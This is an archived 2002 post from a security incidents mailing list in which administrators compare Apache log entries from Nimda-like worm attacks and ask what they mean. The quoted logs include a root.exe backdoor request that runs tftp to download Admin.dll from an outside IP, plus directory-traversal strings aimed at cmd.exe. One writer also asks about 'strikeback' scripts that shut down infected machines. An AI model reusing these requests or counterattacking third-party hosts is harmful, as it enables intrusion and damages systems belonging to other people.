Re: Wave of Nimda-like hits this morning?

From: Erick Brockway (ebrockway@earthlink.net)
Date: 02/27/02


From: "Erick Brockway" <ebrockway@earthlink.net>
To: "Ralph Los" <RLos@enteredge.com>, <incidents@securityfocus.com>
Date: Tue, 26 Feb 2002 18:57:48 -0800


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

    Ok, this has been driving me nuts. Found these lines in my Apache
logs lately:
4.41.54.56 - - [23/Feb/2002:08:26:20 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.54.56%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 2701
4.41.54.56 - - [23/Feb/2002:08:26:22 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295

    Seemingly pointing at a specific IP. Several times now I've seen
this IP and others, as well as the usual bunk nimda lines. What the
heck is it, and does it in fact point to a collection point?
    Also, what is the opinion of running IIS shutdown perl scripts?
The so-called Strikeback Script? On the one hand, it seems it might
get the attention of the owner of the hacked IIS system, on the
other...some unsaved info could be lost on the IIS machine, assuming
the script even works.
    I'm currently searching for a Notification Script, of the type
mentioned elsewhere in this thread, if anyone has it on an FTP.

- ----- Original Message -----
From: "Ralph Los" <RLos@enteredge.com>
To: <incidents@securityfocus.com>
Sent: Tuesday, February 26, 2002 6:46 AM
Subject: Wave of Nimda-like hits this morning?

Hey,
I've had multiple clients' Solaris boxes crashing this morning from
what appears to be a Nimda-like 'scripts/..%5c../root.exe', and the
usual.
The same old unicode characters are present [%2f, %5c] but a new one
has appeared I haven't seen yet. This line:

'/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe'

appears a few times and I'm not quite sure what to make of it...

Please keep in mind that came from a Solaris box, Apache log.
Whatever this (maybe) new bug is, it's blowing up these boxes left
and right...can't figure it out. They're all relatively new 1.3'ish
versions I think.

Anyone else seeing anything weird?

- ----------------------------------------|
Ralph M. Los
Sr. Security Consultant and Trainer
          EnterEdge Technology, L.L.C.
          rlos@enteredge.com
          (770) 955-9899 x.206
- ----------------------------------------|

- ----------------------------------------------------------------------
- ------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPHxLFJkmeTuuwg2cEQIIIgCguagWRT3ygBo/MU8KfmSZX+BKcKgAoOEZ
9jl40lkEIIE90s1XNVBy0LSR
=5Dgf
-----END PGP SIGNATURE-----
